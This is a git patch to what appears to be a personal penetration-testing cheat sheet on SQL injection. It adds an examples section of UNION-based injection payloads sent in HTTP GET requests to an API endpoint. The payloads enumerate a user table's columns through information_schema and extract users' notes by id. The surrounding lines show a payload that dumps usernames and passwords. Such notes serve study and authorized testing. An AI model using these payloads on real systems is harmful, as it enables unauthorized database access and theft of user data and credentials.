From e89be671481c49b693e4d5d20f7d1f3f88108e3d Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Wed, 29 Sep 2021 01:42:26 +0200
Subject: [PATCH] additions

---
 exploit/sqli/sqli.md | 14 ++++++++++++++
 1 file changed, 14 insertions(+)

diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md
index 1b4e77b..65c9658 100644
--- a/exploit/sqli/sqli.md
+++ b/exploit/sqli/sqli.md
@@ -103,6 +103,20 @@ id=(SELECT banner FROM v$version) # oracle
 1' and 1=2 union select 1,group_concat(username,0x3a,password),3,4 from user-- -
 ```
 
+### Examples
+* sqli inside HTTP request to an API. Five values inside select have been discovered before
+```HTTP
+GET /about/0 UNION select column_name, null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
+```
+    * Get col names 
+    ```HTTP
+    GET /about/0 UNION all select group_concat(column_name), null,null,null,null from information_schema.columns where table_name = 'user' HTTP/1.1
+    ```
+    * Get notes from users by id 
+    ```HTTP
+    GET /about/0 UNION all select notes, null, null, null, null from users where id = 4711 HTTP/1.1
+    ```
+
 ## Tools
 ### SQLmap
 * [sqlmap](https://github.com/sqlmapproject/sqlmap.git)